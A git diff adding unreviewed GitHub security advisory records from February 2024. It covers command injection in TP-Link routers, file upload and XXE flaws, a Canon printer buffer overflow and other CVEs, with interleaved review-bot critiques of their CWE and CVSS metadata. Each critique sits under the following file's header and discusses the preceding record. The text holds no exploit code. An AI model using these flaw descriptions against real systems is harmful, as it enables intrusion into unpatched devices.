+ "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41277"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-38"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-120"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mj59-82hp-pgf4/GHSA-mj59-82hp-pgf4.json b/advisories/unreviewed/2024/02/GHSA-mj59-82hp-pgf4/GHSA-mj59-82hp-pgf4.json
new file mode 100644
index 0000000000000..d420e62824f9e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mj59-82hp-pgf4/GHSA-mj59-82hp-pgf4.json
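Review bot: The description and the score pull in different directions: the details say the bug "could allow authenticated administrators to execute code via a network", but the vector is `C:N/I:L/A:L` and `database_specific.severity` is `MODERATE`, which is not how code execution on a NAS is normally scored. Either the vendor deliberately downgraded the impact because the attacker must already be an administrator, or the vector was copied from a different bulletin entry; the QSA-23-38 reference should settle which. Consumers deduplicating by fixed build should also note that three product lines (QTS, QuTS hero, QuTScloud) each carry a distinct fixed version in the details.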
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mj59-82hp-pgf4",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2023-36498"
+ ],
+ "details": "A post-authentication command injection vulnerability exists in the PPTP client functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability and gain access to an unrestricted shell.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36498"
+ },
+ {
+ "type": "WEB",
+ "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1853"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mm24-rjwq-f95c/GHSA-mm24-rjwq-f95c.json b/advisories/unreviewed/2024/02/GHSA-mm24-rjwq-f95c/GHSA-mm24-rjwq-f95c.json
new file mode 100644
index 0000000000000..4ed6e386a4e69
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mm24-rjwq-f95c/GHSA-mm24-rjwq-f95c.json
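Review bot: The record names only the vulnerable build (`1.3.0 build 20230322 Rel.70591`) and no fixed firmware, and its sole non-NVD reference is the Talos report, so a reader cannot tell from this entry whether any shipped release closes the PPTP-client command injection. A "fixed in" line, or an explicit statement that no fix was available at publication, would make the `HIGH` rating actionable for anyone running an ER7206. The `PR:H` / `S:U` vector is consistent with the "post-authentication" wording, so the exposure is to whoever already holds router-admin credentials.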
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mm24-rjwq-f95c",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6925"
+ ],
+ "details": "The Unlimited Addons for WPBakery Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'importZipFile' function in versions up to, and including, 1.0.42. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin (the default is editor role, but access can also be granted to contributor role), to upload arbitrary files on the affected site's server which may make remote code execution possible.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6925"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/unlimited-addons-for-wpbakery-page-builder/trunk/inc_php/layouts/unitecreator_layouts_exporter.class.php?rev=2900676#L703"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a78b76d6-4068-4141-9726-7db439aa6a9f?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mm8x-p4pr-4p9f/GHSA-mm8x-p4pr-4p9f.json b/advisories/unreviewed/2024/02/GHSA-mm8x-p4pr-4p9f/GHSA-mm8x-p4pr-4p9f.json
new file mode 100644
index 0000000000000..acf8fd5ae5b7e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mm8x-p4pr-4p9f/GHSA-mm8x-p4pr-4p9f.json
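Review bot: `cwe_ids` is empty for an advisory whose details describe "arbitrary file uploads due to insufficient file type validation" in `importZipFile`; `"cwe_ids": ["CWE-434"]` matches the text. The `PR:H` in the vector encodes the default editor-role requirement, but the details also say access can be granted to the contributor role, so sites that did that face a lower bar than the score suggests — worth a caveat in the record. No fixed version is stated; the trac link pins a specific revision (`rev=2900676`) of the vulnerable code rather than a fix, so readers must go to the Wordfence entry for remediation.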
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mm8x-p4pr-4p9f",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2023-52239"
+ ],
+ "details": "The XML parser in Magic xpi Integration Platform 4.13.4 allows XXE attacks, e.g., via onItemImport.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52239"
+ },
+ {
+ "type": "WEB",
+ "url": "https://ds-security.com/post/xml_external_entity_injection_magic_xpi/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www2.magicsoftware.com/ver/docs/Downloads/Magicxpi/4.14/Windows/ReleaseNotes4.14.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T07:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mmc3-qp8j-6fpj/GHSA-mmc3-qp8j-6fpj.json b/advisories/unreviewed/2024/02/GHSA-mmc3-qp8j-6fpj/GHSA-mmc3-qp8j-6fpj.json
new file mode 100644
index 0000000000000..1ee545d66c2d1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mmc3-qp8j-6fpj/GHSA-mmc3-qp8j-6fpj.json
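Review bot: `cwe_ids` is empty although the details say the XML parser "allows XXE attacks"; `"cwe_ids": ["CWE-611"]` is the direct mapping. There is no CVSS, so `database_specific.severity` is `null` and an XXE in an integration platform goes unranked for anyone consuming the feed; the ds-security write-up is presumably detailed enough to score it. The only fix hint is the 4.14 release-notes PDF, and the details never say 4.14 fixes it — if the PDF supports that, a "fixed in 4.14" statement belongs in the record rather than being left for the reader to infer from a URL.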
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mmc3-qp8j-6fpj",
+ "modified": "2024-02-03T09:30:18Z",
+ "published": "2024-02-03T09:30:18Z",
+ "aliases": [
+ "CVE-2023-44031"
+ ],
+ "details": "Incorrect access control in Reprise License Management Software Reprise License Manager v15.1 allows attackers to arbitrarily save sensitive files in insecure locations via a crafted POST request.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44031"
+ },
+ {
+ "type": "WEB",
+ "url": "https://packetstormsecurity.com/files/176841/Reprise-License-Manager-15.1-Privilege-Escalation-File-Write.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://seclists.org/fulldisclosure/2024/Jan/43"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T09:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mmfm-2hr6-jvqr/GHSA-mmfm-2hr6-jvqr.json b/advisories/unreviewed/2024/02/GHSA-mmfm-2hr6-jvqr/GHSA-mmfm-2hr6-jvqr.json
new file mode 100644
index 0000000000000..3a087d39dd7e6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mmfm-2hr6-jvqr/GHSA-mmfm-2hr6-jvqr.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mmfm-2hr6-jvqr",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2023-6229"
+ ],
+ "details": "Buffer overflow in CPCA PDL Resource Download process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6229"
+ },
+ {
+ "type": "WEB",
+ "url": "https://canon.jp/support/support-info/240205vulnerability-response"
+ },
+ {
+ "type": "WEB",
+ "url": "https://psirt.canon/advisory-information/cp2024-001/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.canon-europe.com/support/product-security-latest-news/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-787"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mmgp-f467-5jfj/GHSA-mmgp-f467-5jfj.json b/advisories/unreviewed/2024/02/GHSA-mmgp-f467-5jfj/GHSA-mmgp-f467-5jfj.json
new file mode 100644
index 0000000000000..df48051382396
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mmgp-f467-5jfj/GHSA-mmgp-f467-5jfj.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mmgp-f467-5jfj",
+ "modified": "2024-02-08T09:30:38Z",
+ "published": "2024-02-08T09:30:38Z",
+ "aliases": [
+ "CVE-2024-0965"
+ ],
+ "details": "The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's page restriction and view page content.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0965"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T09:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mmj5-4682-wjr2/GHSA-mmj5-4682-wjr2.json b/advisories/unreviewed/2024/02/GHSA-mmj5-4682-wjr2/GHSA-mmj5-4682-wjr2.json
new file mode 100644
index 0000000000000..80badd7d33f29
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mmj5-4682-wjr2/GHSA-mmj5-4682-wjr2.json
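Review bot: `cwe_ids` is empty; the details describe unauthenticated reading of restricted page content through the REST API, which maps to `CWE-200` (or, read as a missing authorization check on the API path, `CWE-862`) — either is better than none for consumers filtering by weakness. No fixed version is stated in the details; it is only implied by changeset `3030099`. The pattern described — the restriction enforced on the classic front end but not on the REST API — is a caveat worth recording, since site owners who tested the restriction only in a browser would see nothing wrong.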
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mmj5-4682-wjr2",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2024-1185"
+ ],
+ "details": "A vulnerability classified as problematic has been found in Nsasoft NBMonitor Network Bandwidth Monitor 1.6.5.0. This affects an unknown part of the component Registration Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252675. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1185"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fitoxs.com/vuldb/11-exploit-perl.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252675"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252675"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mmrc-cc78-9f9w/GHSA-mmrc-cc78-9f9w.json b/advisories/unreviewed/2024/02/GHSA-mmrc-cc78-9f9w/GHSA-mmrc-cc78-9f9w.json
new file mode 100644
index 0000000000000..1f95ae28b0dbd
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mmrc-cc78-9f9w/GHSA-mmrc-cc78-9f9w.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mmrc-cc78-9f9w",
+ "modified": "2024-02-08T00:32:18Z",
+ "published": "2024-02-05T18:31:37Z",
+ "aliases": [
+ "CVE-2024-24469"
+ ],
+ "details": "Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the delete_post .php.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24469"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tang-0717/cms/blob/main/2.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T16:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mp2w-hjcj-f5g9/GHSA-mp2w-hjcj-f5g9.json b/advisories/unreviewed/2024/02/GHSA-mp2w-hjcj-f5g9/GHSA-mp2w-hjcj-f5g9.json
new file mode 100644
index 0000000000000..0067c91daa980
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mp2w-hjcj-f5g9/GHSA-mp2w-hjcj-f5g9.json
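Review bot: The details claim a CSRF against `delete_post.php` lets a remote attacker "execute arbitrary code", and the vector (`C:H/I:H/A:H`, HIGH) inherits that claim, yet the only mechanism described is a forged request to a post-deletion endpoint, which on its face yields forced deletion (integrity/availability), not code execution or data disclosure. Unless the tang-0717 write-up shows something beyond that, the confidentiality and code-execution wording overstates the bug and the record should say "delete posts" instead. The file name is also garbled as "delete_post .php" with a stray space.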
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mp2w-hjcj-f5g9",
+ "modified": "2024-02-04T21:30:43Z",
+ "published": "2024-02-04T21:30:43Z",
+ "aliases": [
+ "CVE-2023-52426"
+ ],
+ "details": "libexpat through 2.5.0 allows recursive XML Entity Expansion if XML_DTD is undefined at compile time.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52426"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/libexpat/libexpat/pull/777"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/libexpat/libexpat/commit/0f075ec8ecb5e43f8fdca5182f8cca4703da0404"
+ },
+ {
+ "type": "WEB",
+ "url": "https://cwe.mitre.org/data/definitions/776.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T20:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mqq6-542f-w38g/GHSA-mqq6-542f-w38g.json b/advisories/unreviewed/2024/02/GHSA-mqq6-542f-w38g/GHSA-mqq6-542f-w38g.json
new file mode 100644
index 0000000000000..264b5f1aa9527
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mqq6-542f-w38g/GHSA-mqq6-542f-w38g.json
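Review bot: `cwe_ids` is empty although the record's own references include `https://cwe.mitre.org/data/definitions/776.html`; `"cwe_ids": ["CWE-776"]` is the obvious fill. The details make the trigger conditional — "if XML_DTD is undefined at compile time" — so this is a build-configuration-dependent exposure, and consumers who vendor libexpat (it is embedded in many runtimes and applications) should check how their copy was built before treating every copy `<= 2.5.0` as affected; a sentence saying so would prevent blanket rebuilds. No fixed release is named; the PR and commit are the only fix markers, and no CVSS means `database_specific.severity` is `null`.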
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mqq6-542f-w38g",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2023-47618"
+ ],
+ "details": "A post authentication command execution vulnerability exists in the web filtering functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47618"
+ },
+ {
+ "type": "WEB",
+ "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1859"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mvmq-hrr8-p65f/GHSA-mvmq-hrr8-p65f.json b/advisories/unreviewed/2024/02/GHSA-mvmq-hrr8-p65f/GHSA-mvmq-hrr8-p65f.json
new file mode 100644
index 0000000000000..6bdf8b5356466
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mvmq-hrr8-p65f/GHSA-mvmq-hrr8-p65f.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mvmq-hrr8-p65f",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20815"
+ ],
+ "details": "Improper authentication vulnerability in onCharacteristicReadRequest in Auto Hotspot prior to SMR Feb-2024 Release 1 allows adjacent attackers connect to victim's mobile hotspot without user awareness.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20815"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json b/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json
new file mode 100644
index 0000000000000..ca1006e5a8ae0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mwhj-qw9v-2hj2",
+ "modified": "2024-02-02T12:30:30Z",
+ "published": "2024-02-02T12:30:30Z",
+ "aliases": [
+ "CVE-2023-51820"
+ ],
+ "details": "An issue in Blurams Lumi Security Camera (A31C) v.2.3.38.12558 allows a physically proximate attackers to execute arbitrary code.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51820"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/roman-mueller/PoC/tree/master/CVE-2023-51820"
+ },
+ {
+ "type": "WEB",
+ "url": "https://infosec.rm-it.de/2024/02/01/blurams-lumi-security-camera-analysis/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T10:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mwrc-5q9v-5658/GHSA-mwrc-5q9v-5658.json b/advisories/unreviewed/2024/02/GHSA-mwrc-5q9v-5658/GHSA-mwrc-5q9v-5658.json
new file mode 100644
index 0000000000000..ea0a39b679d41
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mwrc-5q9v-5658/GHSA-mwrc-5q9v-5658.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mwrc-5q9v-5658",
+ "modified": "2024-02-02T18:30:30Z",
+ "published": "2024-02-02T00:31:27Z",
+ "aliases": [
+ "CVE-2024-23031"
+ ],
+ "details": "Cross Site Scripting (XSS) vulnerability in is_water parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23031"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/weng-xianhu/eyoucms/issues/57"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mwx2-8cmg-6vmj/GHSA-mwx2-8cmg-6vmj.json b/advisories/unreviewed/2024/02/GHSA-mwx2-8cmg-6vmj/GHSA-mwx2-8cmg-6vmj.json
new file mode 100644
index 0000000000000..e29472d1725b0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mwx2-8cmg-6vmj/GHSA-mwx2-8cmg-6vmj.json
@@ -0,0 +1,47 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mwx2-8cmg-6vmj",
+ "modified": "2024-02-04T18:30:19Z",
+ "published": "2024-02-04T18:30:19Z",
+ "aliases": [
+ "CVE-2020-36773"
+ ],
+ "details": "Artifex Ghostscript before 9.53.0 has an out-of-bounds write and use-after-free in devices/vector/gdevtxtw.c (for txtwrite) because a single character code in a PDF document can map to more than one Unicode code point (e.g., for a ligature).",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36773"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugs.ghostscript.com/show_bug.cgi?id=702229"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.opensuse.org/show_bug.cgi?id=1177922"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.ghostscript.com/?p=ghostpdl.git%3Ba=commit%3Bh=8c7bd787defa071c96289b7da9397f673fddb874"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs9530"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T18:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mxjm-2qgc-vv69/GHSA-mxjm-2qgc-vv69.json b/advisories/unreviewed/2024/02/GHSA-mxjm-2qgc-vv69/GHSA-mxjm-2qgc-vv69.json
new file mode 100644
index 0000000000000..8e03be48f6091
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mxjm-2qgc-vv69/GHSA-mxjm-2qgc-vv69.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mxjm-2qgc-vv69",
+ "modified": "2024-02-06T00:30:28Z",
+ "published": "2024-02-06T00:30:28Z",
+ "aliases": [
+ "CVE-2024-1210"
+ ],
+ "details": "The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1210"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.learndash.com/release-notes/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p23j-w6jc-gg7v/GHSA-p23j-w6jc-gg7v.json b/advisories/unreviewed/2024/02/GHSA-p23j-w6jc-gg7v/GHSA-p23j-w6jc-gg7v.json
new file mode 100644
index 0000000000000..965956e10f36c
--- /dev/null
